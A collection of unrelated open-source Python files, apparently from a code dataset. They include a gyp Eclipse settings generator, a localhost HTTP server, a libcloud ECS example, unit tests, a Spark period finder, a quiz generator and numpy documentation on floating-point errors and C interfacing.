set() compiler_includes_list = [] # Find compiler's default include dirs. if compiler_path: command = shlex.split(compiler_path) command.extend(['-E', '-xc++', '-v', '-']) proc = subprocess.Popen(args=command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) output = proc.communicate()[1] # Extract the list of include dirs from the output, which has this format: # ... # #include "..." 
search starts here: # #include <...> search starts here: # /usr/include/c++/4.6 # /usr/local/include # End of search list. # ... in_include_list = False for line in output.splitlines(): if line.startswith('#include'): in_include_list = True continue if line.startswith('End of search list.'): break if in_include_list: include_dir = line.strip() if include_dir not in compiler_includes_list: compiler_includes_list.append(include_dir) flavor = gyp.common.GetFlavor(params) if flavor == 'win': generator_flags = params.get('generator_flags', {}) for target_name in target_list: target = target_dicts[target_name] if config_name in target['configurations']: config = target['configurations'][config_name] # Look for any include dirs that were explicitly added via cflags. This # may be done in gyp files to force certain includes to come at the end. # TODO(jgreenwald): Change the gyp files to not abuse cflags for this, and # remove this. if flavor == 'win': msvs_settings = gyp.msvs_emulation.MsvsSettings(target, generator_flags) cflags = msvs_settings.GetCflags(config_name) else: cflags = config['cflags'] for cflag in cflags: if cflag.startswith('-I'): include_dir = cflag[2:] if include_dir not in compiler_includes_list: compiler_includes_list.append(include_dir) # Find standard gyp include dirs. if config.has_key('include_dirs'): include_dirs = config['include_dirs'] for shared_intermediate_dir in shared_intermediate_dirs: for include_dir in include_dirs: include_dir = include_dir.replace('$SHARED_INTERMEDIATE_DIR', shared_intermediate_dir) if not os.path.isabs(include_dir): base_dir = os.path.dirname(target_name) include_dir = base_dir + '/' + include_dir include_dir = os.path.abspath(include_dir) gyp_includes_set.add(include_dir) # Generate a list that has all the include dirs. 
all_includes_list = list(gyp_includes_set) all_includes_list.sort() for compiler_include in compiler_includes_list: if not compiler_include in gyp_includes_set: all_includes_list.append(compiler_include) # All done. return all_includes_list def GetCompilerPath(target_list, data, options): """Determine a command that can be used to invoke the compiler. Returns: If this is a gyp project that has explicit make settings, try to determine the compiler from that. Otherwise, see if a compiler was specified via the CC_target environment variable. """ # First, see if the compiler is configured in make's settings. build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0]) make_global_settings_dict = data[build_file].get('make_global_settings', {}) for key, value in make_global_settings_dict: if key in ['CC', 'CXX']: return os.path.join(options.toplevel_dir, value) # Check to see if the compiler was specified as an environment variable. for key in ['CC_target', 'CC', 'CXX']: compiler = os.environ.get(key) if compiler: return compiler return 'gcc' def GetAllDefines(target_list, target_dicts, data, config_name, params, compiler_path): """Calculate the defines for a project. Returns: A dict that includes explict defines declared in gyp files along with all of the default defines that the compiler uses. """ # Get defines declared in the gyp files. 
all_defines = {} flavor = gyp.common.GetFlavor(params) if flavor == 'win': generator_flags = params.get('generator_flags', {}) for target_name in target_list: target = target_dicts[target_name] if flavor == 'win': msvs_settings = gyp.msvs_emulation.MsvsSettings(target, generator_flags) extra_defines = msvs_settings.GetComputedDefines(config_name) else: extra_defines = [] if config_name in target['configurations']: config = target['configurations'][config_name] target_defines = config['defines'] else: target_defines = [] for define in target_defines + extra_defines: split_define = define.split('=', 1) if len(split_define) == 1: split_define.append('1') if split_define[0].strip() in all_defines: # Already defined continue all_defines[split_define[0].strip()] = split_define[1].strip() # Get default compiler defines (if possible). if flavor == 'win': return all_defines # Default defines already processed in the loop above. if compiler_path: command = shlex.split(compiler_path) command.extend(['-E', '-dM', '-']) cpp_proc = subprocess.Popen(args=command, cwd='.', stdin=subprocess.PIPE, stdout=subprocess.PIPE) cpp_output = cpp_proc.communicate()[0] cpp_lines = cpp_output.split('\n') for cpp_line in cpp_lines: if not cpp_line.strip(): continue cpp_line_parts = cpp_line.split(' ', 2) key = cpp_line_parts[1] if len(cpp_line_parts) >= 3: val = cpp_line_parts[2] else: val = '1' all_defines[key] = val return all_defines def WriteIncludePaths(out, eclipse_langs, include_dirs): """Write the includes section of a CDT settings export file.""" out.write(' <section name="org.eclipse.cdt.internal.ui.wizards.' 
\ 'settingswizards.IncludePaths">\n') out.write(' <language name="holder for library settings"></language>\n') for lang in eclipse_langs: out.write(' <language name="%s">\n' % lang) for include_dir in include_dirs: out.write(' <includepath workspace_path="false">%s</includepath>\n' % include_dir) out.write(' </language>\n') out.write(' </section>\n') def WriteMacros(out, eclipse_langs, defines): """Write the macros section of a CDT settings export file.""" out.write(' <section name="org.eclipse.cdt.internal.ui.wizards.' \ 'settingswizards.Macros">\n') out.write(' <language name="holder for library settings"></language>\n') for lang in eclipse_langs: out.write(' <language name="%s">\n' % lang) for key in sorted(defines.iterkeys()): out.write(' <macro><name>%s</name><value>%s</value></macro>\n' % (escape(key), escape(defines[key]))) out.write(' </language>\n') out.write(' </section>\n') def GenerateOutputForConfig(target_list, target_dicts, data, params, config_name): options = params['options'] generator_flags = params.get('generator_flags', {}) # build_dir: relative path from source root to our output files. # e.g. "out/Debug" build_dir = os.path.join(generator_flags.get('output_dir', 'out'), config_name) toplevel_build = os.path.join(options.toplevel_dir, build_dir) # Ninja uses out/Debug/gen while make uses out/Debug/obj/gen as the # SHARED_INTERMEDIATE_DIR. Include both possible locations. 
  shared_intermediate_dirs = [os.path.join(toplevel_build, 'obj', 'gen'),
                              os.path.join(toplevel_build, 'gen')]

  GenerateCdtSettingsFile(target_list,
                          target_dicts,
                          data,
                          params,
                          config_name,
                          os.path.join(toplevel_build,
                                       'eclipse-cdt-settings.xml'),
                          options,
                          shared_intermediate_dirs)
  GenerateClasspathFile(target_list,
                        target_dicts,
                        options.toplevel_dir,
                        toplevel_build,
                        os.path.join(toplevel_build,
                                     'eclipse-classpath.xml'))


def GenerateCdtSettingsFile(target_list, target_dicts, data, params,
                            config_name, out_name, options,
                            shared_intermediate_dirs):
  """Write an Eclipse CDT settings XML file (include paths + macros) for one
  build configuration to out_name."""
  gyp.common.EnsureDirExists(out_name)
  with open(out_name, 'w') as out:
    out.write('<?xml version="1.0" encoding="UTF-8"?>\n')
    out.write('<cdtprojectproperties>\n')

    eclipse_langs = ['C++ Source File', 'C Source File', 'Assembly Source File',
                     'GNU C++', 'GNU C', 'Assembly']
    compiler_path = GetCompilerPath(target_list, data, options)
    include_dirs = GetAllIncludeDirectories(target_list, target_dicts,
                                            shared_intermediate_dirs,
                                            config_name, params, compiler_path)
    WriteIncludePaths(out, eclipse_langs, include_dirs)
    defines = GetAllDefines(target_list, target_dicts, data, config_name,
                            params, compiler_path)
    WriteMacros(out, eclipse_langs, defines)

    out.write('</cdtprojectproperties>\n')


def GenerateClasspathFile(target_list, target_dicts, toplevel_dir,
                          toplevel_build, out_name):
  '''Generates a classpath file suitable for symbol navigation and code
  completion of Java code (such as in Android projects) by finding all
  .java and .jar files used as action inputs.'''
  gyp.common.EnsureDirExists(out_name)
  result = ET.Element('classpath')

  def AddElements(kind, paths):
    # First, we need to normalize the paths so they are all relative to the
    # toplevel dir.
    rel_paths = set()
    for path in paths:
      if os.path.isabs(path):
        rel_paths.add(os.path.relpath(path, toplevel_dir))
      else:
        rel_paths.add(path)

    # Sorted for a deterministic file; each path becomes one classpathentry.
    for path in sorted(rel_paths):
      entry_element = ET.SubElement(result, 'classpathentry')
      entry_element.set('kind', kind)
      entry_element.set('path', path)

  AddElements('lib', GetJavaJars(target_list, target_dicts, toplevel_dir))
  AddElements('src', GetJavaSourceDirs(target_list, target_dicts, toplevel_dir))
  # Include the standard JRE container and a dummy out folder
  AddElements('con', ['org.eclipse.jdt.launching.JRE_CONTAINER'])
  # Include a dummy out folder so that Eclipse doesn't use the default /bin
  # folder in the root of the project.
  AddElements('output', [os.path.join(toplevel_build, '.eclipse-java-build')])

  ET.ElementTree(result).write(out_name)


def GetJavaJars(target_list, target_dicts, toplevel_dir):
  '''Generates a sequence of all .jars used as inputs.'''
  for target_name in target_list:
    target = target_dicts[target_name]
    for action in target.get('actions', []):
      for input_ in action['inputs']:
        # '$'-prefixed inputs are unexpanded gyp variables, not real paths.
        if os.path.splitext(input_)[1] == '.jar' and not input_.startswith('$'):
          if os.path.isabs(input_):
            yield input_
          else:
            # Relative inputs are relative to the target's own directory.
            yield os.path.join(os.path.dirname(target_name), input_)


def GetJavaSourceDirs(target_list, target_dicts, toplevel_dir):
  '''Generates a sequence of all likely java package root directories.'''
  for target_name in target_list:
    target = target_dicts[target_name]
    for action in target.get('actions', []):
      for input_ in action['inputs']:
        if (os.path.splitext(input_)[1] == '.java' and
            not input_.startswith('$')):
          dir_ = os.path.dirname(os.path.join(os.path.dirname(target_name),
                                              input_))
          # If there is a parent 'src' or 'java' folder, navigate up to it -
          # these are canonical package root names in Chromium. This will
          # break if 'src' or 'java' exists in the package structure. This
          # could be further improved by inspecting the java file for the
          # package name if this proves to be too fragile in practice.
          parent_search = dir_
          # NOTE: this is a while/else — the else runs only when the loop
          # condition fails (a 'src'/'java' ancestor was found) without break.
          while os.path.basename(parent_search) not in ['src', 'java']:
            parent_search, _ = os.path.split(parent_search)
            if not parent_search or parent_search == toplevel_dir:
              # Didn't find a known root, just return the original path
              yield dir_
              break
          else:
            yield parent_search


def GenerateOutput(target_list, target_dicts, data, params):
  """Generate an XML settings file that can be imported into a CDT project."""

  if params['options'].generator_output:
    raise NotImplementedError("--generator_output not implemented for eclipse")

  # Either generate the single configuration requested via the 'config'
  # generator flag, or one output per configuration of the first target.
  user_config = params.get('generator_flags', {}).get('config', None)
  if user_config:
    GenerateOutputForConfig(target_list, target_dicts, data, params,
                            user_config)
  else:
    config_names = target_dicts[target_list[0]]['configurations'].keys()
    for config_name in config_names:
      GenerateOutputForConfig(target_list, target_dicts, data, params,
                              config_name)
agry/NGECore2
refs/heads/master
scripts/object/soundobject/soundobject_factory_exterior.py
85615
import sys def setup(core, object): return
CGI-Nederland/FreshAir
refs/heads/master
server.py
2
# Minimal static-file web server: serves the current directory over HTTP/1.0.
# NOTE(review): Python 2 only (BaseHTTPServer/SimpleHTTPServer modules and
# the print statement); under Python 3 this would be http.server.
import sys
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler

HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"

# Port may be supplied as the first CLI argument; defaults to 8000.
if sys.argv[1:]:
    port = int(sys.argv[1])
else:
    port = 8000
server_address = ('127.0.0.1', port)  # loopback only, not externally reachable

HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)

# Report the actually-bound address (useful when port 0 is requested).
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
wuyuewen/libcloud
refs/heads/trunk
docs/examples/container/ecs/container_registry.py
30
# Example: using libcloud's ECS driver to browse an AWS ECR container
# registry and deploy an image to a cluster. Credentials below are dummies.
from libcloud.container.types import Provider
from libcloud.container.providers import get_driver

cls = get_driver(Provider.ECS)

# Connect to AWS
conn = cls(access_id='SDHFISJDIFJSIDFJ',
           secret='THIS_IS)+_MY_SECRET_KEY+I6TVkv68o4H',
           region='ap-southeast-2')

# Get a Registry API client for an existing repository
client = conn.ex_get_registry_client('my-image')

# List all the images
for image in client.list_images('my-image'):
    print(image.name)

# Get a specific image
image = client.get_image('my-image', '14.04')
print(image.path)
# >> 647433528374.dkr.ecr.region.amazonaws.com/my-image:14.04

# Deploy that image
cluster = conn.list_clusters()[0]
container = conn.deploy_container(
    cluster=cluster,
    name='my-simple-app',
    image=image
)
geomalgo/geomalgo
refs/heads/master
test/grid2d/test_grid2d.py
2
"""Unit tests for geomalgo's 2D grid indexing helpers.

NOTE(review): `np` and `step` are imported but unused in this chunk; kept
in place since only part of the file may be visible here.
"""
import unittest

import numpy as np

from geomalgo import (
    Point2D, Grid2D, compute_index, compute_row_col, coord_to_index
)
from geomalgo.data import step


class TestCoordToIndex(unittest.TestCase):

    def test_normal(self):
        """Test index is computed from coordinate"""
        # -2  -1.5  -1  -0.5   0   0.5   1   1.5   2
        #  |    |    |    |    |    |    |    |    |
        #  | 0  | 1  | 2  | 3  | 4  | 5  | 6  | 7  |
        minval = -2
        delta = 0.5
        self.assertEqual(coord_to_index( 0.75, minval, delta), 5)
        self.assertEqual(coord_to_index(-0.75, minval, delta), 2)


class TestComputeIndex(unittest.TestCase):

    def test_normal(self):
        """Test cell index is computed from cell ix and iy"""
        # iy
        #     +---+---+---+
        #  1  | 3 | 4 | 5 |
        #     +---+---+---+
        #  0  | 0 | 1 | 2 |
        #     +---+---+---+
        #       0   1   2   ix
        nx = 3
        self.assertEqual(compute_index(nx, 0, 0), 0)
        self.assertEqual(compute_index(nx, 1, 0), 1)
        self.assertEqual(compute_index(nx, 2, 0), 2)
        self.assertEqual(compute_index(nx, 0, 1), 3)
        self.assertEqual(compute_index(nx, 1, 1), 4)
        self.assertEqual(compute_index(nx, 2, 1), 5)


class TestComputeRowCol(unittest.TestCase):

    def test_normal(self):
        """Test cell ix and iy are computed from cell index"""
        # iy
        #     +---+---+---+
        #  1  | 3 | 4 | 5 |
        #     +---+---+---+
        #  0  | 0 | 1 | 2 |
        #     +---+---+---+
        #       0   1   2   ix
        nx = 3
        # Inverse of compute_index: index -> (ix, iy).
        self.assertEqual(compute_row_col(0, nx), (0, 0))
        self.assertEqual(compute_row_col(1, nx), (1, 0))
        self.assertEqual(compute_row_col(2, nx), (2, 0))
        self.assertEqual(compute_row_col(3, nx), (0, 1))
        self.assertEqual(compute_row_col(4, nx), (1, 1))
        self.assertEqual(compute_row_col(5, nx), (2, 1))


class TestGrid2D(unittest.TestCase):

    def test_find_cell(self):
        """Test the cell containing a point is found"""
        # iy
        # 30  +-------+-------+-------+-------+
        #     |   4   |   5   |   6   |   7   |
        #  1  |       |       |   P   |       |
        #     |       |       |       |       |
        # 20  +-------+-------+-------+-------+
        #     |   0   |   1   |   2   |   3   |
        #  0  |   Q   |       |       |       |
        #     |       |       |       |       |
        # 10  +-------+-------+-------+-------+
        #    -1     -0.5      0      0.5      1
        #        0       1       2       3   ix
        grid = Grid2D(xmin=-1, xmax=1.0, nx=4, ymin=10, ymax=30, ny=2)
        P = Point2D(0.25, 25)
        Q = Point2D(-0.75, 15)

        cell = grid.find_cell(P)
        self.assertEqual(cell.ix, 2)
        self.assertEqual(cell.iy, 1)
        self.assertEqual(cell.index, 6)

        cell = grid.find_cell(Q)
        self.assertEqual(cell.ix, 0)
        self.assertEqual(cell.iy, 0)
        self.assertEqual(cell.index, 0)


if __name__ == '__main__':
    unittest.main()
enableiot/iotanalytics-rule-engine
refs/heads/master
pydeps/rules/conditions/processors/matchingPeriodFinder.py
1
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


class MatchingPeriodFinder(object):
    """Finds the longest run of consecutive records that pass a predicate.

    NOTE(review): `data` appears to be a Spark RDD (isEmpty/map/sortBy/
    coalesce/reduce are used) — confirm against callers.
    """

    NO_MATCHING_PERIOD = 0

    def __init__(self, data):
        # data: distributed collection of records; result: the final
        # accumulator dict from the reduce, kept for get_largest_start_time().
        self.data = data
        self.result = None

    def get_largest(self, map_function):
        """Return the longest matching period length, or NO_MATCHING_PERIOD.

        map_function must map a raw record to a dict with at least
        'timestamp' and 'passed' keys (see ReduceFunctionBuilder).
        """
        reduce_fun = ReduceFunctionBuilder().reduce_fun
        if self.data.isEmpty():
            return self.NO_MATCHING_PERIOD
        # coalesce(1) forces a single partition so the reduce sees records
        # strictly in timestamp order, which the state machine relies on.
        self.result = self.__map_and_sort(map_function).coalesce(1).reduce(lambda y, z: reduce_fun(y, z))
        if ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD not in self.result:
            return self.NO_MATCHING_PERIOD
        # The run still open at the end of the data may itself be the longest.
        if ReduceFunctionBuilder.is_current_greatest(self.result):
            return self.result[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD]
        return self.result[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD]

    def get_largest_start_time(self):
        """Return the start time (seconds) of the period found by get_largest().

        Timestamps are divided by 1000, i.e. stored in milliseconds.
        """
        if self.result is None:
            return self.NO_MATCHING_PERIOD
        if 'period_start' in self.result:
            return self.result['period_start'] / 1000
        return self.result['timestamp'] / 1000

    def __map_and_sort(self, map_function):
        # Sort by timestamp so the pairwise reduce walks records in order.
        return self.data.map(lambda x: map_function(x)).sortBy(lambda x: x['timestamp']).cache()


class ReduceFunctionBuilder(object):
    """State machine folded over timestamp-ordered records by reduce().

    Each record dict carries 'timestamp' and 'passed'; the fold threads
    the current run length and the largest run seen so far through the
    right-hand accumulator.
    """

    LARGEST_MATCHING_PERIOD = 'largest_matching_period'
    CURRENT_MATCHING_PERIOD = 'current_matching_period'
    TIMESTAMP = 'timestamp'

    def reduce_fun(self, x, y):
        # x is the accumulated state (carrying the current run's start
        # timestamp), y is the next record; y becomes the new accumulator.
        if x['passed'] and y['passed']:
            self.__increase_current_matching_period(x, y)
        elif x['passed']:
            # matching sequence end
            self.__compare_matching_periods(x, y)
        else:
            # no matching data
            self.__reset_matching_period(x, y)
        return y

    def __increase_current_matching_period(self, x, y):
        # Current run length = now - run start; then propagate the run's
        # start timestamp forward so the next step measures from it too.
        y[self.CURRENT_MATCHING_PERIOD] = y[self.TIMESTAMP] - x[self.TIMESTAMP]
        y[self.TIMESTAMP] = x[self.TIMESTAMP]
        self.__copy_largest_period(x, y)

    def __compare_matching_periods(self, x, y):
        # A run just ended at x: promote it to largest if it beats the record.
        if self.is_current_greatest(x):
            self.__set_largest_period(x, y)
        else:
            self.__copy_largest_period(x, y)
        y[self.CURRENT_MATCHING_PERIOD] = 0

    def __reset_matching_period(self, x, y):
        y[self.CURRENT_MATCHING_PERIOD] = 0
        if self.__has_largest_period(x):
            self.__copy_largest_period(x, y)

    @staticmethod
    def is_current_greatest(value):
        # True when the open run is (or would be) the longest seen so far.
        return not ReduceFunctionBuilder.__has_largest_period(value) \
            or value[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD] < value[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD]

    @staticmethod
    def __set_largest_period(x, y):
        y[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD] = x[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD]
        y['period_start'] = x[ReduceFunctionBuilder.TIMESTAMP]

    def __copy_largest_period(self, x, y):
        if self.__has_largest_period(x):
            y[self.LARGEST_MATCHING_PERIOD] = x[self.LARGEST_MATCHING_PERIOD]
            y['period_start'] = x[self.TIMESTAMP]

    @staticmethod
    def __has_largest_period(value):
        return ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD in value
davidzyx/PythonNotes
refs/heads/master
Part II/ch08_project01.py
1
#! python3
# Project: Generating Random Quiz Files
# Say you're a geography teacher with 35 students in your class and you want to give a pop quiz on
# US state capitals. Alas, your class has a few bad eggs in it, and you can't trust the students
# not to cheat. You'd like to randomize the order of questions so that each quiz is unique, making
# it impossible for anyone to crib answers from anyone else. Of course, doing this by hand would
# be a lengthy and boring affair. Fortunately, you know some Python.

# Creates 35 different quizzes.
# Creates 50 multiple-choice questions for each quiz, in random order.
# Provides the correct answer and three random wrong answers for each question, in random order.
# Writes the quizzes to 35 text files.
# Writes the answer keys to 35 text files.

# This means the code will need to do the following:
# Store the states and their capitals in a dictionary.
# Open the quiz and answer key text files via context managers.
# Use random.shuffle() to randomize the order of the questions and multiple-choice options.

import random, os

os.chdir('./Part II/ch08')
try:
    os.makedirs('./proj1')
    print('Folder proj1 created.')
except FileExistsError:
    print('Folder proj1 already created.')
os.chdir('./proj1')

# The quiz data. Keys are states and values are their capitals.
capitals = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix',
            'Arkansas': 'Little Rock', 'California': 'Sacramento',
            'Colorado': 'Denver', 'Connecticut': 'Hartford',
            'Delaware': 'Dover', 'Florida': 'Tallahassee',
            'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise',
            'Illinois': 'Springfield', 'Indiana': 'Indianapolis',
            'Iowa': 'Des Moines', 'Kansas': 'Topeka',
            'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge',
            'Maine': 'Augusta', 'Maryland': 'Annapolis',
            'Massachusetts': 'Boston', 'Michigan': 'Lansing',
            'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson',
            'Missouri': 'Jefferson City', 'Montana': 'Helena',
            'Nebraska': 'Lincoln', 'Nevada': 'Carson City',
            'New Hampshire': 'Concord', 'New Jersey': 'Trenton',
            'New Mexico': 'Santa Fe', 'New York': 'Albany',
            'North Carolina': 'Raleigh', 'North Dakota': 'Bismarck',
            'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City',
            'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg',
            'Rhode Island': 'Providence', 'South Carolina': 'Columbia',
            'South Dakota': 'Pierre', 'Tennessee': 'Nashville',
            'Texas': 'Austin', 'Utah': 'Salt Lake City',
            'Vermont': 'Montpelier', 'Virginia': 'Richmond',
            'Washington': 'Olympia', 'West Virginia': 'Charleston',
            'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'}

# Generate 35 quiz files.
for quizNum in range(35):
    # Open the quiz and answer key files with context managers so they are
    # closed even if an error occurs mid-quiz (the original leaked handles
    # on exception because close() was only called at the end).
    with open('capitalsquiz%s.txt' % (quizNum + 1), 'w') as quizFile, \
         open('capitalsquiz_answers%s.txt' % (quizNum + 1), 'w') as answerKeyFile:

        # Write out the header for the quiz.
        quizFile.write('Name:\n\nDate:\n\nPeriod:\n\n')
        quizFile.write((' ' * 20) + 'State Capitals Quiz (Form %s)' % (quizNum + 1))
        quizFile.write('\n\n')

        # Shuffle the order of the states.
        states = list(capitals.keys())
        random.shuffle(states)

        # Loop through all 50 states, making a question for each.
        for questionNum in range(50):

            # Get right and wrong answers: the correct capital plus three
            # randomly sampled capitals of other states, in shuffled order.
            correctAnswer = capitals[states[questionNum]]
            wrongAnswers = list(capitals.values())
            del wrongAnswers[wrongAnswers.index(correctAnswer)]
            wrongAnswers = random.sample(wrongAnswers, 3)
            answerOptions = wrongAnswers + [correctAnswer]
            random.shuffle(answerOptions)

            # Write the question and the answer options to the quiz file.
            quizFile.write('%s. What is the capital of %s?\n' %
                           (questionNum + 1, states[questionNum]))
            for i in range(4):
                quizFile.write(' %s. %s\n' % ('ABCD'[i], answerOptions[i]))
            quizFile.write('\n')

            # Write the answer key to a file.
            answerKeyFile.write('%s. %s\n' % (questionNum + 1,
                                'ABCD'[answerOptions.index(correctAnswer)]))
amite/ghostblog
refs/heads/master
node_modules/grunt-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/common_test.py
2542
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for the common.py file.""" import gyp.common import unittest import sys class TestTopologicallySorted(unittest.TestCase): def test_Valid(self): """Test that sorting works on a valid graph with one possible order.""" graph = { 'a': ['b', 'c'], 'b': [], 'c': ['d'], 'd': ['b'], } def GetEdge(node): return tuple(graph[node]) self.assertEqual( gyp.common.TopologicallySorted(graph.keys(), GetEdge), ['a', 'c', 'd', 'b']) def test_Cycle(self): """Test that an exception is thrown on a cyclic graph.""" graph = { 'a': ['b'], 'b': ['c'], 'c': ['d'], 'd': ['a'], } def GetEdge(node): return tuple(graph[node]) self.assertRaises( gyp.common.CycleError, gyp.common.TopologicallySorted, graph.keys(), GetEdge) class TestGetFlavor(unittest.TestCase): """Test that gyp.common.GetFlavor works as intended""" original_platform = '' def setUp(self): self.original_platform = sys.platform def tearDown(self): sys.platform = self.original_platform def assertFlavor(self, expected, argument, param): sys.platform = argument self.assertEqual(expected, gyp.common.GetFlavor(param)) def test_platform_default(self): self.assertFlavor('freebsd', 'freebsd9' , {}) self.assertFlavor('freebsd', 'freebsd10', {}) self.assertFlavor('openbsd', 'openbsd5' , {}) self.assertFlavor('solaris', 'sunos5' , {}); self.assertFlavor('solaris', 'sunos' , {}); self.assertFlavor('linux' , 'linux2' , {}); self.assertFlavor('linux' , 'linux3' , {}); def test_param(self): self.assertFlavor('foobar', 'linux2' , {'flavor': 'foobar'}) if __name__ == '__main__': unittest.main()
gfyoung/numpy
refs/heads/master
numpy/doc/misc.py
19
""" ============= Miscellaneous ============= IEEE 754 Floating Point Special Values -------------------------------------- Special values defined in numpy: nan, inf, NaNs can be used as a poor-man's mask (if you don't care what the original value was) Note: cannot use equality to test NaNs. E.g.: :: >>> myarr = np.array([1., 0., np.nan, 3.]) >>> np.nonzero(myarr == np.nan) (array([], dtype=int64),) >>> np.nan == np.nan # is always False! Use special numpy functions instead. False >>> myarr[myarr == np.nan] = 0. # doesn't work >>> myarr array([ 1., 0., NaN, 3.]) >>> myarr[np.isnan(myarr)] = 0. # use this instead find >>> myarr array([ 1., 0., 0., 3.]) Other related special value functions: :: isinf(): True if value is inf isfinite(): True if not nan or inf nan_to_num(): Map nan to 0, inf to max float, -inf to min float The following corresponds to the usual functions except that nans are excluded from the results: :: nansum() nanmax() nanmin() nanargmax() nanargmin() >>> x = np.arange(10.) >>> x[3] = np.nan >>> x.sum() nan >>> np.nansum(x) 42.0 How numpy handles numerical exceptions -------------------------------------- The default is to ``'warn'`` for ``invalid``, ``divide``, and ``overflow`` and ``'ignore'`` for ``underflow``. But this can be changed, and it can be set individually for different kinds of exceptions. The different behaviors are: - 'ignore' : Take no action when the exception occurs. - 'warn' : Print a `RuntimeWarning` (via the Python `warnings` module). - 'raise' : Raise a `FloatingPointError`. - 'call' : Call a function specified using the `seterrcall` function. - 'print' : Print a warning directly to ``stdout``. - 'log' : Record error in a Log object specified by `seterrcall`. These behaviors can be set for all kinds of errors or specific ones: - all : apply to all numeric exceptions - invalid : when NaNs are generated - divide : divide by zero (for integers as well!) 
- overflow : floating point overflows - underflow : floating point underflows Note that integer divide-by-zero is handled by the same machinery. These behaviors are set on a per-thread basis. Examples -------- :: >>> oldsettings = np.seterr(all='warn') >>> np.zeros(5,dtype=np.float32)/0. invalid value encountered in divide >>> j = np.seterr(under='ignore') >>> np.array([1.e-100])**10 >>> j = np.seterr(invalid='raise') >>> np.sqrt(np.array([-1.])) FloatingPointError: invalid value encountered in sqrt >>> def errorhandler(errstr, errflag): ... print("saw stupid error!") >>> np.seterrcall(errorhandler) <function err_handler at 0x...> >>> j = np.seterr(all='call') >>> np.zeros(5, dtype=np.int32)/0 FloatingPointError: invalid value encountered in divide saw stupid error! >>> j = np.seterr(**oldsettings) # restore previous ... # error-handling settings Interfacing to C ---------------- Only a survey of the choices. Little detail on how each works. 1) Bare metal, wrap your own C-code manually. - Plusses: - Efficient - No dependencies on other tools - Minuses: - Lots of learning overhead: - need to learn basics of Python C API - need to learn basics of numpy C API - need to learn how to handle reference counting and love it. - Reference counting often difficult to get right. - getting it wrong leads to memory leaks, and worse, segfaults - API will change for Python 3.0! 
2) Cython - Plusses: - avoid learning C API's - no dealing with reference counting - can code in pseudo python and generate C code - can also interface to existing C code - should shield you from changes to Python C api - has become the de-facto standard within the scientific Python community - fast indexing support for arrays - Minuses: - Can write code in non-standard form which may become obsolete - Not as flexible as manual wrapping 3) ctypes - Plusses: - part of Python standard library - good for interfacing to existing sharable libraries, particularly Windows DLLs - avoids API/reference counting issues - good numpy support: arrays have all these in their ctypes attribute: :: a.ctypes.data a.ctypes.get_strides a.ctypes.data_as a.ctypes.shape a.ctypes.get_as_parameter a.ctypes.shape_as a.ctypes.get_data a.ctypes.strides a.ctypes.get_shape a.ctypes.strides_as - Minuses: - can't use for writing code to be turned into C extensions, only a wrapper tool. 4) SWIG (automatic wrapper generator) - Plusses: - around a long time - multiple scripting language support - C++ support - Good for wrapping large (many functions) existing C libraries - Minuses: - generates lots of code between Python and the C code - can cause performance problems that are nearly impossible to optimize out - interface files can be hard to write - doesn't necessarily avoid reference counting issues or needing to know API's 5) scipy.weave - Plusses: - can turn many numpy expressions into C code - dynamic compiling and loading of generated C code - can embed pure C code in Python module and have weave extract, generate interfaces and compile, etc. - Minuses: - Future very uncertain: it's the only part of Scipy not ported to Python 3 and is effectively deprecated in favor of Cython. 6) Psyco - Plusses: - Turns pure python into efficient machine code through jit-like optimizations - very fast when it optimizes well - Minuses: - Only on intel (windows?) - Doesn't do much for numpy? 
Interfacing to Fortran: ----------------------- The clear choice to wrap Fortran code is `f2py <https://docs.scipy.org/doc/numpy/f2py/>`_. Pyfort is an older alternative, but not supported any longer. Fwrap is a newer project that looked promising but isn't being developed any longer. Interfacing to C++: ------------------- 1) Cython 2) CXX 3) Boost.python 4) SWIG 5) SIP (used mainly in PyQT) """ from __future__ import division, absolute_import, print_function
m45t3r/i3pystatus
refs/heads/myfork
tests/test_uname.py
22
import os

from i3pystatus import uname


def test_uname():
    """Every supported format key must render the matching os.uname() field."""
    reference = os.uname()
    for field in ("sysname", "nodename", "release", "version", "machine"):
        widget = uname.Uname(format="{" + field + "}")
        widget.init()
        assert widget.output["full_text"] == getattr(reference, field)
TangHao1987/intellij-community
refs/heads/master
python/testData/copyPaste/singleLine/Indent32.dst.py
664
class C: def foo(self): <caret> y = 2
EricMuller/mywebmarks-backend
refs/heads/master
requirements/twisted/Twisted-17.1.0/build/lib.linux-x86_64-3.5/twisted/trial/test/detests.py
16
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Tests for Deferred handling by L{twisted.trial.unittest.TestCase}.
"""

